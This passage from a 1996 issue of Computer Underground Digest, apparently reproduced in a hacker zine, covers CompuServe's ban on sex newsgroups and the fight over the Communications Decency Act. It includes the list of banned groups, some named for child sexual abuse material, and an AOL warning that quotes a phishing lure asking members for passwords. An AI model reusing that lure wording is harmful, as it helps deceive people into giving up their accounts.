alt.binaries.pictures.erotica.teen alt.binaries.pictures.erotica.teen.d alt.binaries.pictures.erotica.teen.female alt.binaries.pictures.erotica.teen.fuckTeens alt.binaries.pictures.erotica.teen.maleTeens alt.binaries.pictures.erotica.terry.agar alt.binaries.pictures.erotica.transvestites alt.binaries.pictures.erotica.uncut alt.binaries.pictures.erotica.urine alt.binaries.pictures.erotica.voyeurism alt.binaries.pictures.erotica.young alt.binaries.pictures.groupsex alt.binaries.pictures.lesbians alt.binaries.pictures.lolita.misc alt.binaries.pictures.nude.celebrities alt.binaries.sounds.erotica alt.homosexual alt.magick.sex alt.magick.sex.angst alt.motss.bisexua-l alt.politics.sex alt.recovery.addiction.sexual alt.recovery.sexual-addiction alt.religion.sexuality alt.sex alt.sex.aliens alt.sex.anal alt.sex.animals alt.sex.asphyx alt.sex.balls alt.sex.bears alt.sex.bestiality alt.sex.bestiality.barney alt.sex.bestiality.hamster.duct-tape alt.sex.bondage alt.sex.bondage.furtoonia alt.sex.bondage.sco.unix alt.sex.boredom alt.sex.boys alt.sex.breast alt.sex.brothels alt.sex.carasso alt.sex.children alt.sex.cthulhu alt.sex.disney alt.sex.doom.with-sound alt.sex.dylan alt.sex.enemas alt.sex.erotica.market.place alt.sex.erotica.marketplace alt.sex.escorts.ads alt.sex.escorts.ads.d alt.sex.exhibitionism alt.sex.extropians alt.sex.fat alt.sex.femdom alt.sex.fencing alt.sex.fetish.amputee alt.sex.fetish.diapers alt.sex.fetish.drew-barrymore alt.sex.fetish.fa alt.sex.fetish.fashion alt.sex.fetish.feet alt.sex.fetish.hair alt.sex.fetish.jello alt.sex.fetish.motorcycles alt.sex.fetish.orientals alt.sex.fetish.peterds.momma alt.sex.fetish.power-rangers.kimberly.tight-spandex alt.sex.fetish.robots alt.sex.fetish.scat alt.sex.fetish.size alt.sex.fetish.smoking alt.sex.fetish.sportswear alt.sex.fetish.startrek alt.sex.fetish.the-bob alt.sex.fetish.tickling alt.sex.fetish.tinygirls alt.sex.fetish.trent-reznor alt.sex.fetish.waifs alt.sex.fetish.watersports alt.sex.fetish.wet-and-messy 
alt.sex.fetish.white-mommas alt.sex.fetish.wrestling alt.sex.first-time alt.sex.fish alt.sex.furry alt.sex.gangbang alt.sex.girl.watchers alt.sex.girls alt.sex.guns alt.sex.hello-kitty alt.sex.historical alt.sex.homosexual alt.sex.incest alt.sex.intergen alt.sex.jesus alt.sex.jp alt.sex.magazines alt.sex.marsha-clark alt.sex.masturbation alt.sex.midgets alt.sex.modem-kamikaze alt.sex.motss alt.sex.movies alt.sex.necrophilia alt.sex.nudels.me.too alt.sex.oral alt.sex.orgy alt.sex.pedophilia alt.sex.pedophilia.boys alt.sex.pedophilia.girls alt.sex.pedophilia.pictures alt.sex.pedophilia.swaps alt.sex.pictures alt.sex.pictures.d alt.sex.pictures.female alt.sex.pictures.male alt.sex.plushies alt.sex.pre-teens alt.sex.prostitution alt.sex.reptiles alt.sex.safe alt.sex.services alt.sex.sgml alt.sex.sm.fig alt.sex.snakes alt.sex.sounds alt.sex.spanking alt.sex.stories alt.sex.stories.d alt.sex.stories.gay alt.sex.stories.hetero alt.sex.stories.moderated alt.sex.stories.tg alt.sex.strip-clubs alt.sex.super-size alt.sex.swingers alt.sex.tasteless alt.sex.telephone alt.sex.toons alt.sex.trans alt.sex.ugly alt.sex.uncut alt.sex.video-swap alt.sex.voxmeet alt.sex.voyeurism alt.sex.wanted alt.sex.wanted.escorts.ads alt.sex.watersports alt.sex.weight-gain alt.sex.wizards alt.sex.young alt.sex.zoophile alt.sexy.bald.captains alt.stories.erotic alt.support.disabled.sexuality alt.tv.tiny-toon.sex clari.news.crime.sex clari.news.gays clari.news.sex aus.sex de.talk.sex es.alt.sexo fido.ger.sex fido.sex-ger fido7.ru-sex fido7.ru-sex.adv fido7.russian-sex finet.sex fiod7.other.russian.sex fiod7.ru.sex gay-net.behinderte gay-net.btx-ecke gay-net.coming-out gay-net.dfue gay-net.erotic-stories gay-net.gruppen.general gay-net.guide.bundesweit gay-net.guide.weltweit gay-net.haushalt gay-net.international gay-net.kontakte gay-net.labern gay-net.lederecke gay-net.spiele gay-net.test rec.arts.erotica shamash.gayjews slo.sex soc.support.youth.gay-lesbian-bi t-netz.sex t-netz.sex-stories 
tw.bbs.sci.sex ucb.erotica.sensual uw.alt.sex.beastiality uw.alt.sex.bestiality uw.alt.sex.bondage uw.alt.sex.stories uw.alt.sex.stories.d zer.t-netz.sex

------------------------------

Date: Sun, 31 Dec 1995 01:36:22 -0500 (EST)
From: "Declan B. McCullagh"
Subject: File 4--Compuserve: Adam Dershowitz on Censorship

---------- Forwarded message begins here ----------

From--Adam Dershowitz
Subject--Stop the Censorship!
Date--30 Dec 1995 23:51:35 GMT

Feel free to distribute or post the following letter wherever you see fit:

Germany is setting the standards of free speech for the entire world, and Compuserve is going along. This is the first major case of censorship on the internet, and it is important that it is also the last. The eyes of every internet provider, of the US Congress and other governments are on this case to see how it develops.

German prosecutors threatened Compuserve for allowing access to Usenet groups that they deemed to be unacceptable. Compuserve responded by censoring its users over the whole world, by banning these newsgroups. If Germany tried to threaten a US phone company for allowing people to use dirty words on an international phone call the phone company would refuse to comply. Compuserve, given this same choice, chose to censor. They have chosen to take responsibility for the content of everything that crosses through their system, and to reject some of it.

One way to prevent such things from happening again is to make sure that this censorship is not in the economic best interest of Compuserve, and Germany. If they want to interfere with First Amendment rights, then we should exercise our First Amendment rights to not communicate with them. A boycott can be a very effective tool, that can work even if you are not a Compuserve user. They have made a decision about community standards for the world, if you agree that they do not have that right, then do not accept their standards.
If you are a Compuserve subscriber then cancel your account. Germany and Compuserve have chosen to selectively cut themselves off from the rest of the internet community, let's make it a complete separation. Do not send any E-mail to Compuserve or Germany. Do not reply to any newsgroup posts, and do not access any of their web pages. If you receive E-mail, then simply ignore it, send a copy of this letter, or your own explanation that you will no longer use a system that censors. If both Germany and Compuserve can be made into the pariahs of the internet world then perhaps others will get the message that censorship of the 'net is not acceptable and will only succeed in destroying the 'net.

The World Wide Web should allow the exchange of any ideas around the world. It should not be limited to the minimum acceptable ideas that are allowed in any one of the countries or companies. If the information that is available on the 'net is allowed to be only that which is acceptable to people in Germany, Iran, Iraq, China and the US Congress, then the net will be useless. If any one government, company or entity, large or small, is allowed that much control of expression then the freedom on the internet is lost to everyone.

Adam Dershowitz
dersh@mit.edu
218 Thorndike St Apt 104
Cambridge MA 02141

------------------------------

Date: Sat, 30 Dec 1995 23:33:34 -0800 (PST)
From: Declan McCullagh
Subject: File 5--Compuserve: Brad Templeton on ClariNet censorship

From Dave Farber's IP list. A good example of a sex panic on the part of Compuserve -- banning newsgroups they don't even provide...

-Declan

// declan@eff.org // My opinions are not in any way those of the EFF //

---------- Forwarded message ----------

To--Dave Farber
Date--Sat, 30 Dec 1995 15:38:27 -0800 (PST)
From--Brad Templeton

Alas, we were also pretty shocked to see some ClariNet e.news newsgroups listed in the set that Compuserve announced it was banning from their servers in fear of German censorship laws -- but mostly because Compuserve isn't one of our subscribers, and they don't have any of our groups.

We've asked them why they listed them, and not yet heard back, but I think this is actually a very good example of how capricious and dangerous such laws are. They send people into panics, banning anything that looks dangerous, even things they don't even have! If anybody needs a lesson on why laws like the German laws (and the upcoming U.S. decency act) have a chilling effect far beyond even their broad intent, this is it.

Had Compuserve carried our electronic newspaper newsgroups, banning these ones would have been silly. Here are the "lurid" headlines from the last few days of clari.news.sex, a newsgroup that contains only professional reporting on sex-related issues...

    Vatican: Sex education not okay
    Suspended Teacher To Return
    Australian Govt Porn Committee Calls For Action
    Beijing seizes one million porn, illegal books
    Time for the annual best and worst lists
    China customs crack down on pornography imports
    CompuServe suspends online sex topics
    CompuServe bans sex groups, sparking free-speech row

The most recent headlines from clari.news.gays as you can see are equally non-lurid

    Failed Robbery Led To Gay Slay
    Killer To Sell Story
    Gays In Military Judge Quits
    Lesbian Wins Job Bias Suit

I wonder if the Germans thought this was worth banning or CIS made up the list on their own.
Either way, the idea that anybody might, in fear of such laws or under the orders of such laws, ban legitimate professional (and entirely non-lurid) coverage of issues like these is really scary, and we hope our many legitimate subscribers in Germany don't fall prey to this.

While the fact that CIS didn't actually have our material makes this less interesting, a big part of the story is that somebody was driven to remove stuff without even knowing what they were removing.

------------------------------

Date: Mon, 1 Jan 1996 15:25:18 -0500 (EST)
From: "Declan B. McCullagh"
Subject: File 6--WP: Germany Pulls the Shade On CompuServe, Internet

Attached are excerpts from today's article in the Washington Post. Compuserve is weaseling, implying German law forced them to censor not just alt.binaries.pictures.erotica.*, but text-only political discussion groups. And the Christian Coalition is supporting them, of course.

"CompuServe must comply with the laws of the many countries in which we operate," said CompuServe spokesman William Giles. "However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging on-line industry."

"What CompuServe decided to do is a healthy thing," said Heidi Stirrup, [The Christian Coalition's] director of government relations. "I don't see that the Internet is going to be a lesser place" because access to hard-core sexually explicit material has been reduced.

-Declan

------------------------------------------------------------------------

The Washington Post
January 1, 1996

Cyberporn Debate Goes International
Germany Pulls the Shade On CompuServe, Internet

By Kara Swisher
Washington Post Staff Writer

It's often been said that the Internet is a frontier where no one's laws apply. But last week, on one portion of the global computer network, German law took hold.
CompuServe Inc., one of the largest on-line service providers in the United States, announced that it would temporarily ban access by all its customers worldwide to some sexually oriented material on the Internet in response to a request from prosecutors in Germany that the material be banned there. For technological reasons, CompuServe cannot block the access of just its 220,000 customers in Germany. "CompuServe must comply with the laws of the many countries in which we operate," said CompuServe spokesman William Giles. "However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging on-line industry." The Christian Coalition, a church organization that has campaigned against pornography on-line, praised the service's move. "What CompuServe decided to do is a healthy thing," said Heidi Stirrup, the coalition's director of government relations. "I don't see that the Internet is going to be a lesser place" because access to hard-core sexually explicit material has been reduced... How far the restrictions will spread remains unclear. Margaret Ryan, a spokeswoman for America Online Inc., the Vienna on-line service that also operates in Germany, said her Virginia-based service had received no request to block the material to its German customers. She would not comment on what the service would do if asked to comply with such a demand. "We are investigating the situation," she said. "But we have no ban." A spokesman for Microsoft Corp.'s Microsoft Network said it had received no request either, but noted that its network had built-in technology that allows parents to control what their children can reach. Both services said that unlike CompuServe, they have the technological means to block just in Germany. That way, U.S. customers' access would not be affected... 
The German government request is aimed at about 200 of the Internet's 15,000 newsgroups, which are message boards covering topics as diverse as sailing, chess and the jokes of late-night TV show host David Letterman. The ones targeted by Germany in an ongoing investigation are sexually graphic and explicit in nature and include child pornography in a manner that German prosecutors consider illegal under their criminal law.

If other countries follow Germany's lead, it could mean that on-line services might have to create a different offering for each country or only offer something to everyone that boils down to the lowest common denominator...

Questions of which rules apply have been debated for decades concerning the print and broadcast media.

"This is not unexpected, this conflict of laws, because it has gone on for all important emerging mediums," said Tony Rutkowski, executive director of the Internet Society, the Alexandria-based advisory body involved with Internet policy...

------------------------------

Date: Sun, 31 Dec 1995 15:20:24 -0500
From: ZMacGordon@aol.com
Subject: File 7--Fwd: ALERT: Password Security

Below is the latest news from AOL. Old trick, old news, but people still fall for it, eh?

---------------------
Forwarded message:
Subj: ALERT: Password Security
Date: 95-12-31 07:40:09 EST
From: Steve Case
To: ZMacGordon

Dear Friend of America Online,

I want to raise your awareness about an issue that affects us all: the importance of never revealing your password.

Recently there have been a few incidents where computer hackers have tried to gain access to passwords by soliciting individuals online. These hackers have increased their level of sophistication so much that they have begun to correspond in a style to make you believe they are representing America Online.
Here's an edited excerpt from a recent e-mail attempt: "Dear AOL Community Member: AOL is experiencing major problems...Due to a virus that was recently loaded...onto our main user database, containing most of our member registration information, we are currently experiencing widespread system failure. The problem originated...when our system was illegally breached by a former AOL employee. We believe the employee, who is currently being questioned by authorities, loaded a virus into our database. Because we identified the problem quickly, we were able to stop the problem before the entire database was deleted. The files that were deleted, however, happened to be the database link files...that link a user's password and screen name to the rest of their account. We are currently...working with McAfee Associates (Anti-Virus), to replace the lost files... ...Some of the effects as a result of not having the database link files include: random log-off's, AOLnet runs slower, and Email may accidentally be deleted. These problems are MAJOR inconveniences to our users, so we need your help to fix the problem." The letter continues, outlining the steps you must take to keep your account active, and awarding you free online hours for your troubles. Sending e-mail is just one tactic. Another approach is by using IMs (Instant Messages), where a hacker will notice you are online and try to pass himself off as an employee. Hackers sometimes scan chat areas and the member directory for screen names. Simply put, your passwords are like items in your safety deposit box. They're confidential. YOU are the only person who should know your password. Giving someone (even unintentionally) your password -- especially online -- is like handing over your wallet, keys, and other valuables to complete strangers. There is absolutely no reason why America Online would ever ask you for your password! 
Be aware: NO EMPLOYEE OR REPRESENTATIVE OF AMERICA ONLINE WILL EVER ASK YOU FOR YOUR PASSWORD, YOUR CREDIT CARD NUMBER, OR TO VERIFY YOUR BILLING INFORMATION ONLINE. IF THEY DO, BE SUSPICIOUS AND TAKE ACTION--REPORT IT IMMEDIATELY.

Here are some quick steps to keep your passwords secure:

1) Immediately change your passwords (at keyword PASSWORD) to at least 6 alphanumeric characters -- combination of letters and numbers -- for all of your sub-accounts. Delete unused sub-accounts.

2) NEVER use your screen name, first or last name, town, street, etc. as a password. Do not use a common word. Add a few digits to a word, or misspell it. Hackers use all kinds of programs that search for common words.

3) Inform spouses, children, and others who have access to your account to take the same safety measures, and to NEVER give out passwords.

4) Report suspicious behavior at keyword STAFFPAGER immediately.

Computer hacking on America Online is not widespread. But it's an activity -- and an illegal act -- which hinders our ability to conduct business and ensure a safe online community. AOL will pursue all legal action and law enforcement protection within our right to protect the security of our service.

We also rely on our members, partners, remote community leaders, and others with overhead accounts much like a neighborhood watch program -- to help crush hacking, to maintain confidentiality of the simplest personal belonging (your password), and to report activity of this kind to AOL immediately.

If you have any questions, please discuss them with your contact at AOL. Thank you, and have a Happy New Year.

Regards,
Steve Case

------------------------------

Date: Wed, 3 Jan 1996 12:46:00 -0800 (PST)
From: Declan McCullagh
Subject: File 8--Reuters: Telecom Bill Nixed Until Budget Fixed

Earlier this afternoon, Reuters reported that Newt Gingrich says no work will be done on the telecom bill until the budget mess is over:

In response to a question about whether the telecommunications bill was on the table in talks with Senate leaders, Gingrich said there will be ''nothing on the telecom bill until we have a budget.''

------------------------------

Date: Mon, 1 Jan 1996 21:40:57 -0600 (CST)
From: David Smith
Subject: File 9--(fwd) Postcard to Briberspace (fwd)

---------- Forwarded message ----------

Tom Klemesrud
Cyberspace
North Hollywood, CA 91601
December 12, 1995

Congressman Howard Berman
Briberspace
Washington D.C.

FROM CYBERSPACE TO BRIBERSPACE

"Religion: The last refuge of scoundrels and politicians."
    -Mark Twain

I am taking this opportunity to write you from cyberspace in vehement protest on this day--National Electronic Communications Censorship Protest day. Americans have fought and died for our guaranteed Constitutional rights of freedom of speech, and now this Congress has decided those sacrifices were made in vain--"we'll just wipe those away ... we'll do it for the kids." The implication is--by some perverse notion--that the kids will benefit with all Americans' free speech rights stripped away. Someone's gone nuts in briberspace.

Congressman, if you were an active Internet user, you would know that Exon and his cronies have mis-characterized the perils of cyberspace. I have yet to find one thing obscene on the Net. If cyberspace can't be free, and parents don't feel inclined to use filtering technology or supervise their children, then the Internet is not for those children--they are most likely lost anyway through parental neglect. The Internet, or government, should not and cannot take the place of parents and teachers.
The government cannot censor information content. You may know, we already have laws against pornography and child abuse. You know it, I know it, the American People know it. Don't think you're going to get an extra vote from gutting the Constitution. You saw the front page of yesterday's Los Angeles Times I hope. No politician is going to spin this one into the "fighting pornography" or "preventing Society's collapse." The people are brighter than this and you know it--by the 30% approval rating Congress got two days ago.

I asked Senator Exon's office for a couple URL addresses for what was in his blue book, and the address did not exist. Perhaps the Senator's staff put that stuff up? Did you ask him where he got the smut he was shocking everybody with? Perhaps he got his information from Martin Rimm--the one who embarrassed Senator Grassley?

There are kids killing each other in the streets of California, and you want to send the BBS Sysop to prison for 2 years for running a BBS that can possibly free people from their hopelessness; because they might see an "indecent" word like "tits" on a computer BBS, or by some fluke of filtering technology, glimpse a picture of a naked woman. I would have hoped your efforts might have been a little less silly, and a little more real-world productive--California kids are killing each other in the streets, joining street gangs, engaged in drive-by shootings, selling and using drugs. But perhaps, during the course of these activities, they are not hearing "indecent" words, or aren't exposed to a picture of a naked woman? The priorities in briberspace are upside-down.

I am talking about your support for Senator Exon's Communications Decency Act. There is nothing decent about this act--it is a dark-ages political attempt at depriving your constituents of the freedom of speech rights guaranteed them in the First Amendment of the Constitution.
It amazes me how public servants in our secular government--with its separation of church and state--can so easily embrace the extremist political agenda of right wing religion zealots, hell bent on lording-over speech and communications in the country, like the Christian Coalition, and the Church of Scientology. I can only hope you did it for the PAC money, for any other motivations for supporting unconstitutional law that I can think of, is far worse.

Thus, I coin the space you work in--the halls of Congress--as "briberspace:" That space where seemingly corrupt politicians snidely ignore the people they are supposed to represent, and meet in smoke-filled back rooms with the scoundrel political action committees, taking bribes in return for their powerful vote. Make no mistake: this IS the general scorn for Congress most Americans feel. In a recent poll only 30% of the public gave Congress an approval rating.

The People are afraid of politicians like you--uninspired, unthinking politicians--who think they are Kings or Queens meant to lord-over the People of the land, protecting them from the evils of information and thoughts that aren't government approved: Politicians who at every turn, take yet another stab at trying to take away that which the People have left--of any value--their freedoms.

President Clinton said, "I can't understand how People can say they love their country and hate their government." It is the scoundrels and politicians held in deep scorn that the People cannot stomach--I puked last Sunday night watching a scene from the Movie "The Distinguished Gentleman" as the Congressman took a PAC bribe. (I just wanted to share that with you.) Yet, the scoundrels and politicians seem to keep coming up with new and innovative ways of stealing our liberty, at every turn, in almost every back-room committee meeting. Is it some new version of fascism we're trying to secretly install?
Please think again, before you vote on the Communications Decency Act that attempts to unconstitutionally deprive Americans (only) of their free speech rights, with its "indecent speech" provisions. Government does not have the business trying to regulate content in communications. And, I don't think you're going to be willing to build a communications wall around the borders. Have you ever thought of off-shore Internet Service Providers? Have you ever thought you might be destroying a multi-billion dollar service industry that this country has the lead in right now?

A recent A. C. Nielsen survey found that there are now some 20 million Americans now communicating on-line on the Internet. I predict that if this draconian dark-ages legislative agenda you've backed, is forwarded; these millions from cyberspace may materialize into briberspace--like the million man march--to help the scoundrels of the PAC's and politicians beholding to the PAC scoundrels--see the light of the errors of their ways. And, if they can't be shown the light, make them feel the heat.

You've offended a great many people with this proposed legislation, and perhaps gotten some political gain with it--like so many times before--from the ignorance of the unfortunate. But, the People will ultimately not allow their communications to be "dumbed-down" to a happy-face 5th grade level. They will fight for their rights to speak and think freely. The ACLU will immediately challenge your CDA. There is also promised civil disobedience, in one instance, by a Texas judge to protest the law.

This law is a cruel joke that will backfire on Congress. Please rethink it. Please work to solve our real problems. Don't destroy the one good thing this country has. You won't be able to spin-doctor this travesty of legislation to your political advantage.

Sincerely yours,
Tom Klemesrud

PS: You know I run a BBS with over 4,000 voters right in your congressional district.
Yet, we haven't heard that you have an E-mail address. I'll be posting this letter to the public bulletin board section.

------------------------------

Date: Sun, 16 Dec 1995 22:51:01 CDT
From: CuD Moderators
Subject: File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995)

Cu-Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost electronically.

CuD is available as a Usenet newsgroup: comp.society.cu-digest

Or, to subscribe, send post with this in the "Subject:" line:

    SUBSCRIBE CU-DIGEST

Send the message to: cu-digest-request@weber.ucsd.edu

DO NOT SEND SUBSCRIPTIONS TO THE MODERATORS.

The editors may be contacted by voice (815-753-0303), fax (815-753-6302) or U.S. mail at: Jim Thomas, Department of Sociology, NIU, DeKalb, IL 60115, USA.

To UNSUB, send a one-line message: UNSUB CU-DIGEST
Send it to CU-DIGEST-REQUEST@WEBER.UCSD.EDU
(NOTE: The address you unsub must correspond to your From: line)

Issues of CuD can also be found in the Usenet comp.society.cu-digest news group; on CompuServe in DL0 and DL4 of the IBMBBS SIG, DL1 of LAWSIG, and DL1 of TELECOM; on GEnie in the PF*NPC RT libraries and in the VIRUS/SECURITY library; from America Online in the PC Telecom forum under "computing newsletters;" On Delphi in the General Discussion database of the Internet SIG; on RIPCO BBS (312) 528-5020 (and via Ripco on internet); and on Rune Stone BBS (IIRGWHQ) (203) 832-8441. CuD is also available via Fidonet File Request from 1:11/70; unlisted nodes and points welcome.

EUROPE: In BELGIUM: Virtual Access BBS: +32-69-844-019 (ringdown)
        Brussels: STRATOMIC BBS +32-2-5383119 2:291/759@fidonet.org
        In ITALY: ZERO! BBS: +39-11-6507540
        In LUXEMBOURG: ComNet BBS: +352-466893

UNITED STATES: etext.archive.umich.edu (192.131.22.8) in /pub/CuD/
               ftp.eff.org (192.88.144.4) in /pub/Publications/CuD/
               aql.gatech.edu (128.61.10.53) in /pub/eff/cud/
               world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/
               wuarchive.wustl.edu in /doc/EFF/Publications/CuD/
EUROPE:        nic.funet.fi in pub/doc/cud/ (Finland)
               ftp.warwick.ac.uk in pub/cud/ (United Kingdom)

The most recent issues of CuD can be obtained from the Cu Digest WWW site at:
URL: http://www.soci.niu.edu/~cudigest/

COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing information among computerists and to the presentation and debate of diverse views. CuD material may be reprinted for non-profit as long as the source is cited. Authors hold a presumptive copyright, and they should be contacted for reprint permission. It is assumed that non-personal mail to the moderators may be reprinted unless otherwise specified. Readers are encouraged to submit reasoned articles relating to computer culture and communication. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
            the views of the moderators. Digest contributors assume all
            responsibility for ensuring that articles submitted do not
            violate copyright protections.

------------------------------

End of Computer Underground Digest #7.01
************************************

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #5, File #12 of 12

The End

Right now I am going to put issues 3, 4 and 5 into HTML, and they will join 1 and 2 at http://hertz.njit.edu/~mrs3691. When I go back to school, I plan on putting graphics on the page, and moving it to a better provider. Issues 6 and beyond will hopefully go out on time, but a little reader input would help. So if you have any thoughts on the zine, or hacking in general, send them in. And wherever you hack, may the ethic be with you!